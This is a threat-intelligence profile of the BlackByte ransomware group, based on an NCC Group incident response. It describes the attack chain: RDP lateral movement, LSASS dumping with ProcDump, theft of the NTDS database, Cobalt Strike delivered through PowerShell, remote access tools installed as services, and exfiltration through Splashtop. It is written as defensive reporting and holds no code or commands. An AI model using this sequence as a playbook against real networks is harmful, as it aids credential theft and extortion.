Black-Byte

BlackByte is a ransomware threat actor/group associated in the provided content with a ransomware sample recovered during an NCC Group incident response engagement. NCC Group assessed with medium confidence that the ransomware deployed in that intrusion, identified by ransom note as the “Everest group,” was related to BlackByte, and attributed the analyzed sample to BlackByte as a C# variant rather than a Go variant. NCC Group stated it could not confirm whether another actor copied BlackByte source code or whether BlackByte resumed use of the C# variant. In the observed intrusion, the actor used compromised legitimate accounts and Remote Desktop Protocol (RDP) for lateral movement. Credential access included dumping LSASS with ProcDump and collecting the Active Directory NTDS database, which was archived as ntds.dit.zip. Discovery activity included network scanning with netscan.exe, netscanpack.exe, and SoftPerfectNetworkScannerPortable.exe, with outputs saved under C:\Users\Public\Downloads. Cobalt Strike was the primary command-and-control mechanism, executed via PowerShell using a download-and-execute pattern, and a Metasploit payload was also identified. The actor additionally deployed AnyDesk, Splashtop Remote Desktop, and Atera as secondary remote access tools and persistence mechanisms, installed as Windows services. Data was archived with WinRAR and exfiltrated using Splashtop file transfer capabilities. The operation was consistent with double extortion, involving both data exfiltration and encryption. The actor also routinely deleted tooling, reconnaissance outputs, and collected archives from hosts to evade detection. Known alias in the provided content: black_byte. The content also references a possible relationship between Everest ransomware and BlackByte, but only with medium confidence.